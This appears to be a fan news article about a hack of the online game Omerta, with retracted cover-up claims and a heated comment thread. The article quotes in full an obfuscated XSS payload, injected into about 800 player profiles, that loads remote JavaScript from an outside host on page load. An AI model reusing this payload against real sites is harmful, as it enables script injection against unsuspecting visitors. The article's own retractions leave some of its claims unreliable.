» Menu

» Login

» OB/Site News

Omerta News Integration
Comments: 58 - Views: 54443 - Votes: 0
War rating
Comments: 10 - Views: 26235 - Votes: 4
Reporters Wanted!
Comments: 2 - Views: 18275 - Votes: 3
» Articles
Date Comments Rating

General Comments & Major Rumors
Comments: 57,979 - Views: 15,716,214 - Votes: 81
Endless Struggle !
Comments: 501 - Views: 16,915 - Votes: 0
23-09 Reset → 30 September 2022, Friday → 12:00 OT
Comments: 68 - Views: 8,747 - Votes: 0
30-09 Welcome to Round #40!
Comments: 2 - Views: 2,087 - Votes: 0
19-09 Congratulations Reichsthaler!
Comments: 0 - Views: 1,999 - Votes: 0
01-09 Not Penny's boat..
Comments: 72 - Views: 17,836 - Votes: 0
21-08 First Family!
Comments: 6 - Views: 2,555 - Votes: 0
12-08 Welcome to Round #39
Comments: 5 - Views: 2,461 - Votes: 0
03-08 Reset → 12 August 2022, Friday → 10:00 OT
Comments: 17 - Views: 5,128 - Votes: 0
27-07 Congratulations Vengeance!
Comments: 8 - Views: 2,650 - Votes: 0
go back
go forward
» Barafranca News

No news found. Reset in progress?
» Online last 15 minutes

Guests: 509
Total members: 3747
Online: 0 (0%)
Members:
22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4797d 12h 20m 11s ago by LL
Comments: 164
Views: 67,432
Votes: 0 (0 average)
Version: 3.2
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.


In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.

Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!

After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)

They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)


Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.


This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.

Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.

Update:

Just as more proofs, the hackers has released a list of 515 users with their set testament.

Also they released the Global Vars of the server of Barafranca.

Update 28/09:

After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.

Update:

One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.

Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
comments

Add a YouTube movie Add an image Add a link/url Help
Anonymous (21:36:47 - 27-09)
Link Quote
Hugobust at 21:29:33 on 27/09:
Facebook also got all your private data, so your argument is invalid.

great comparing _o_

:z
Hugobust (21:29:33 - 27-09)
Link Quote
Facebook also got all your private data, so your argument is invalid.
Anonymous (19:25:37 - 27-09)
Link Quote
brando

it isn't fake at all,
even #help admitting on their way of talking

your team failed!
what about our privacy?
go away and let others do it better,
last version all we heard are things covered in,

2nd hack this version, use people who can protect it!
klementino Netherlands (16:50:35 - 27-09)
Link Quote
sbanks at 10:18:18 on 27/09:
Brando - rly at 07:13:05 on 26/09:
NB Sbanks - I emailed - did not yet contact me.

I don't pretend to be 'a dev' or to have any specific technical expertise of any merit. I am working with skilled people who do that.

My complaint here is simple: this 'news' article is just a made up pack of lies.

I'd like to interview Sbanks about his source... knowing full well that *he does not have one*

Over and out.

o/

since i don't have a source how come i have the following information:

testament from about ~100 users : Testament

and

global vars from your server

why just 100 members? now you fuck people over on selection, if you come with this proof, come with all users you have.
Anonymous (15:58:27 - 27-09)
Link Quote
How can u call a hack legit?
Anonymous (15:42:50 - 27-09)
Link Quote
Its not about hackers being 'right' in this case, its about Brando being wrong.

Time and time again the player-base reacted on changes or events that where happening ingame, either intentional or not.
Every single time players get or find a platform to share their opinion about stuff that took place.
And almost every time the crew either ignored or dismissed the general opinion in those topics since they are either 'wrong', stupid or LOLOMGCHEATERSHAHA.
Crushing down every comment on Lackeys for example with 'Lackey User' isnt a real way to communicate. You might as well close down the fucking newspost from the start since you show no intention AT ALL to listen to issues that get addressed. And thats fine, but then dont act like you do.

And that same problem is still ongoing, even today Brando dismissed Lackey complaints on FB by calling the poster a stupid cheater or something.
At the start of this version, or end of last cant remember, the community was promised a tool to help decide resets. Finally 'we' would be able to decide when a version was done. It was the end of all problems, THE way to turn omerta back into a community game.
7months+ later, nothing.

Where is it?
"Its comming!'
Where is it?
"Its coming!'
Where is it?
"Its coming!'
Where is it?
"Fucking scripts!!'
Where is it?
"Lackeys v2 have prio!'

Etc.

And now, once again, we are faced with the same old incapability to respond to subjects that matter. And it doesn't even matter if this hack is legit or not, altho i think its hard to call the testament and other parses fake since those look way to real to be fake, we are, once again without an official statement. So yeah, omerta prolly got hacked, because if they wherent there would have been 10 newsposts about it, all OB channels would be closed and sbanks and others would have been permanently g-lined. The lack of those measures kinda hints to them knowing the hack was legit, since if acted upon now there would be no reason for the hackers to not release everything they found.

All we have is a 'funny' Brando responding with some loose comments that dont address the issue at all
The hack, if real, isn't justified by their behaviour, by any means.
Yet, a 'crew' with such incompetence as shown in the past few weeks/months would have been fired from any other job prolly. Personal information from YOUR costumers may have been exposed due to a weakness in YOUR software. And calling sbanks a drunk fuck doesn't make that concern go away, if anything it increases it.

So statement time brando, or are you still claiming its just one big hoax, and that the Testaments and Global Vars posted are all fake as well?
Anonymous (14:23:01 - 27-09)
Link Quote
Hi all readers

For starter what should i include with readers are the "hackers" part off the readers aswell?
I hope that most of the omerta (barafranca) players play omerta cuz the like it and they dont mind the changes so much as they come and go.

Wondering if some players because the are bored or any other insulting reason i can come up with, starting Hacking Omerta if ur tired of it or dont like the changes please just leave.

Think most of the players will agree the security of the Omerta Servers are rubbish and they should fix it, but what do u thinks helps more laying all information of all or select group of Omerta players on the table is going to solve that?, Might be smart to contact crew about it. And if Ur so "Smart" with codes etc. JOIN THEM? tell Ur ideas help them why hack? wanna ruin the game for others?

thats 1 side of the story,

Beyond crew;

Nice job on the War Articles i like to read the articles and whine about and/or show off :p
It's a good thing that as last reserve the hackers come here and tell the crew about it but u should be way more careful with laying info on the table if u wanna do ur job well from my point of view.
I think u should that in reconsideration that Ur(crew) not running the game.
??Where did "Times" go??

Anyway all have a fun (last) part of the version and many more 2 come
Laterz
Anonymous (13:50:53 - 27-09)
Link Quote
First a joint then my story..
Anonymous (12:52:20 - 27-09)
Link Quote
Owned, Brando. They had full access and you know it. Well..you do now.
sbanks Guatemala (10:18:18 - 27-09)
Link Quote
Brando - rly at 07:13:05 on 26/09:
NB Sbanks - I emailed - did not yet contact me.

I don't pretend to be 'a dev' or to have any specific technical expertise of any merit. I am working with skilled people who do that.

My complaint here is simple: this 'news' article is just a made up pack of lies.

I'd like to interview Sbanks about his source... knowing full well that *he does not have one*

Over and out.

o/

since i don't have a source how come i have the following information:

testament from about ~100 users : Testament

and

global vars from your server
Anonymous (05:50:06 - 27-09)
Link Quote
Brando - rly at 02:20:38 on 26/09:
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@


btw duno if you read what some guy below said or you're jsut too stuck up on this one post and calling Sbanks names

but someone said something about that old list that was hacked and they were actually on it..... a few days old but they were there bulletcount and all .. now tell me ... that was made up too mate ? or what.

im failing to understand alot of things at this moment
as for that list i wasnt even around then ;)

i really liked what you do as the game guy Brando lol but well you stooped very low with replying here the way you did it could have been done so much more professional from your part .. i mean you did get awfully defensive if nothing happened there is no need to jump into such conclusions of lies and such :) just could politely suggest an interview.. awell live and learn huh :D maybe you'll take my advice next time :P
Anonymous (05:43:49 - 27-09)
Link Quote
nice guy you are rix imagine getting second chances about abusing crew from him :') ......

this bloke is a bloody joke i can understand that he may be frusterated with whats written but repeating the same abuse thing again and again is childish and makes me think what kind of child are we paying to play online o.O

i mean Brando answer this.....

hav you ever emailed barefranca ? :') lucky to ever get a reply let alone with in a week i suggest unless you changing the way you do your emails

i dare say you cant say shit about sbanks and OB replying to msg's its been not long at all and i dont even think unless there was a source that Sbanks would even make this up as said below it seems preety real leak to me

and what does sbanks have to gain from posting lies Brando ? nothing nothing at all he has no need to lie however...... how much do you have to lose... hm lets see

10k x 2.80 euros just for one hmm im guessing you got more to lie for Brando ;)

please drop the insults it makes you look pathetic and unable to stand criticism grow up!

even if omerta was hacked .. my bet is you stand to lose more from covering it up than making it out to be a lie .... so lets get it out there for real soon huh :) would be a nice interview to see when you guys get time..
Rix Netherlands (10:19:38 - 26-09)
Link Quote
Dear Brando,

We always like to take interviews or in any other way put anything up on our site other than the plain war articles. However, being that most of us do not like this version at all and since most of us are busy with real life things, such as school or work, or working on other projects, we, at this moment, do not have the time for an interview, even though we would really like to hear the admin's side of the story. For example, out of our current 8-11 crew members, only 2 are online at least once a day, and only 5 once a week. This is our fault, we know, but blaming us for it is not going to change everything.

Therefore, I kindly suggest to have patience until both parties (Omerta crew and OBN crew) have time or, when you want to have your reply out in the open as soon as possible (which I would understand you want in this certain situation), use your extensive freedom of speech on our site and write an excessive comment including explanations on how these three, for us, coherent, events (downtime, database setup leak and profiles infected with code) could have taken place or a description on what really happened.

Furthermore, I would like to repeat a previous notice of mine that we normally would remove posts including excessive name calling and insults on our journalistic integrity. Please see this as your second warning. Thank you in advance.
Brando - rly (07:13:05 - 26-09)
Link Quote
NB Sbanks - I emailed - did not yet contact me.

I don't pretend to be 'a dev' or to have any specific technical expertise of any merit. I am working with skilled people who do that.

My complaint here is simple: this 'news' article is just a made up pack of lies.

I'd like to interview Sbanks about his source... knowing full well that *he does not have one*

Over and out.

o/
Brando - rly (02:20:38 - 26-09)
Link Quote
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@
Anonymous (20:05:31 - 23-09)
Link Quote
Anonymous at 19:21:36 on 23/09:
this brando guy, what a humour, dosnt know shit about coding aswell as his entire team, and then comes here acting out and shit. Trololol.

Brando ur a joke like your 99% random game and your dipshit crew members.


xD i was gonan c/p you this topic :P and have a lol

see you tomorrow ;) bed time now bud :P
Anonymous (19:21:36 - 23-09)
Link Quote
this brando guy, what a humour, dosnt know shit about coding aswell as his entire team, and then comes here acting out and shit. Trololol.

Brando ur a joke like your 99% random game and your dipshit crew members.
Anonymous (18:44:57 - 23-09)
Link Quote
i definetly can imagine omerta covering up another hack cause they know how the community responded last time.

So yes i think omerta should come with a better statement then they did now.
Anonymous (10:01:49 - 23-09)
Link Quote
Without questioning the article since that turns into another yeah really!!/no not really!! story; the database looks pretty fucking legit.

Ballantines Serbia (09:12:00 - 23-09)
Link Quote
Rix at 08:55:17 on 23/09:
Brando - rly at 05:22:18 on 23/09:
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@
We gladly would have and still will put in your side of the story, and even write down or adjust our own conclusions like we did with the current evidence we got if you bring your own evidence or credible explanation.

Normally we would remove posts like these for the name calling by the way.


Then do it Rix, he would remove it if someone said that to him on omerta forums...